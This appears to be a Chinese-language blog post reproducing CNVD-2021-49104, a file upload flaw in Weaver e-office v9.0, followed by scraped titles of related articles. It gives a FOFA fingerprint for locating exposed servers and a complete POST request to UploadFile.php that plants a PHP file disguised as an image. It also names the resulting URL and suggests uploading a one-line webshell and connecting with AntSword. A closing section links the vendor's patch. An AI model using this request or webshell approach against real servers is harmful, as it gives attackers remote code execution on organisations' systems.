0x01 漏洞简介

泛微e-office是泛微旗下的一款标准协同移动办公平台。由于 e-office 未能正确处理上传模块中的用户输入,攻击者可以通过该漏洞构造恶意的上传数据包,最终实现任意代码执行。

影响版本:泛微 e-office v9.0

0x02  FOFA指纹

app="泛微-EOffice"

 0x03 漏洞复现

作者自己搭建的环境 直接运行exe文件安装,设置端口,ip即可

下载链接:https://pan.baidu.com/s/1OPxpdgT1RZfVGsVsX7u7ag 
提取码:wars

访问设置好的ip:port    如下图片即搭建成功  默认用户名admin 无密码

在当前界面刷新一下,进行抓包,改造请求包

POC

POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host:x.x.x.x:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: close
Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6
Cookie: LOGIN_LANG=cn; PHPSESSID=0acfd0a2a7858aa1b4110eca1404d348
Content-Length: 189
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4

--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="test.php"
Content-Type: image/jpeg

<?php phpinfo(test);?>

--e64bdf16c554bbc109cecef6451c26a4--

发包之后,出现如上图情况,访问    /images/logo/logo-eoffice.php

发现上传成功,当然也可以是上传一句话,通过蚁剑连接

0x04漏洞复现

厂商已提供漏洞修补方案,建议用户下载使用:

http://v10.e-office.cn/eoffice9update/safepack.zip

CNVD-2021-49104——泛微E-Office文件上传漏洞相关推荐

  1. 泛微E-Office最新文件上传漏洞(CNVD-2021-49104)

    0x00  漏洞介绍 泛微e-office是泛微旗下的一款标准协同移动办公平台.主要面向中小企业.该漏洞是由于 e-office 未能正确处理上传模块中用户输入导致的,攻击者可以构造恶意的上传数据包, ...

  2. 泛微e-cology9前台文件上传漏洞复现

    目录 1.前言 2.漏洞概述 3.漏洞原理 4.影响版本 5.漏洞等级 6.漏洞复现

  3. CatfishCMS文件上传漏洞(CNVD-2021-42363)

    本博客已搬迁至:https://n0puple.github.io/ 此处不再更新文章 本文仅用于技术讨论与研究,文中的实现方法切勿应用在任何违法场景.如因涉嫌违法造成的一切不良影响,本文作者概不负责 ...

  4. 代码审计--CatfishCMS文件上传漏洞

    声明:本公众号大部分文章来黑白之间安全团队成员的实战经验以及学习积累,文章内公布的漏洞或者脚本都来自互联网,未经授权,严禁转载. 请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作 ...

  5. 泛微E-Office文件上传漏洞(CNVD-2021-49104)

    泛微E-Office文件上传漏洞(CNVD-2021-49104) 漏洞描述 泛微e-office是泛微旗下的一款标准协同移动办公平台.由于 e-office 未能正确处理上传模块中的用户输入,攻击者 ...

  6. (php)泛微E-Office文件上传漏洞(原理分析+复现+批量检测)

    漏洞描述 泛微e-office是泛微旗下的一款标准协同移动办公平台. CNVD-2021-49104 由于 e-office 未能正确处理上传模块中的用户输入,攻击者可以通过该漏洞构造恶意的上传数据包 ...

  7. 泛微OA V8 SQL注入漏洞和文件上传漏洞

    fofa语句 app="泛微-协同办公OA" SQL注入 在泛微OA V8中的getdata.jsp文件里,通过gatData方法将数据获取并回显在页面上,而在getData方法中 ...

  8. 某office前台任意文件上传漏洞分析

    X微e-office的那个前台任意文件上传漏洞已经被爆出一段时间了,相关的漏洞利用脚本甚至是漏洞批量利用脚本 也有很多.在这里根据系统代码结合POC来分析一下这个漏洞点. 定位漏洞点 [私信回复&qu ...

  9. php上传漏洞绕过gd库,jQuery File Upload任意文件上传漏洞

    事件背景 jQuery是一个快速.简洁的JavaScript框架,是继Prototype之后又一个JavaScript代码库(或JavaScript框架).jQuery File Upload一个jQ ...

  10. 【burpsuite安全练兵场-服务端8】文件上传漏洞-7个实验(全)

    前言: 介绍: 博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章). 殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edus ...

最新文章

  1. 1.lamp网站构建
  2. Android四大基本组件和生命周期的介绍
  3. 原生JS添加类名 删除类名
  4. jacoco统计server端功能测试覆盖率
  5. 文件过滤_jmeter(七)-BeanShell对数据过滤保存文件
  6. python画图入门
  7. easyui php分页,easyui datagrid分页 4、easyUI-七种布局(layout)
  8. 非华为电脑配对华为手机(RMB+5899¥)
  9. Spring中三种编程式事务的使用
  10. android插件依赖和aar依赖,Android Studio添加aar依赖的两种方式
  11. 信贷违约风险预测(一)样本数据
  12. 简单的关闭iframe窗口和获取父页面元素
  13. 解决方案架构师的职责
  14. Apache HttpClient4使用教程
  15. 使用小龙Dev-C++作为Windows下的FORTRAN集成开发环境
  16. genymotion-安卓模拟器-修改IMEI
  17. 人造金刚石 量子计算机,金刚石并非坚不可摧:科研小组创造首个量子计算机桥...
  18. Flutter 调用百度地图APP实现位置搜索、路线规划
  19. Android View部分消失效果实现
  20. WORD2003相关问题

热门文章

  1. tp5框架配置多个Cache
  2. 教大家了解数显充气泵传感器,也就是气压传感器在充气泵中的应用
  3. 《特别推荐》10套精美的免费网站后台管理系统模板
  4. kdbx后缀文件打开
  5. 机器学习必备------手把手教你安装sklearn包
  6. python正则表达式排除字符_正则表达式排除特定字符串
  7. cuda安装教程+cudnn安装教程
  8. 图解JVM--(四)内存模型
  9. win7计算机建立无线网络连接不上,教你电脑连接不上无线网络怎么办
  10. 显卡超频linux,Linux 5.12内核将支持Radeon RX 6000系列显卡超频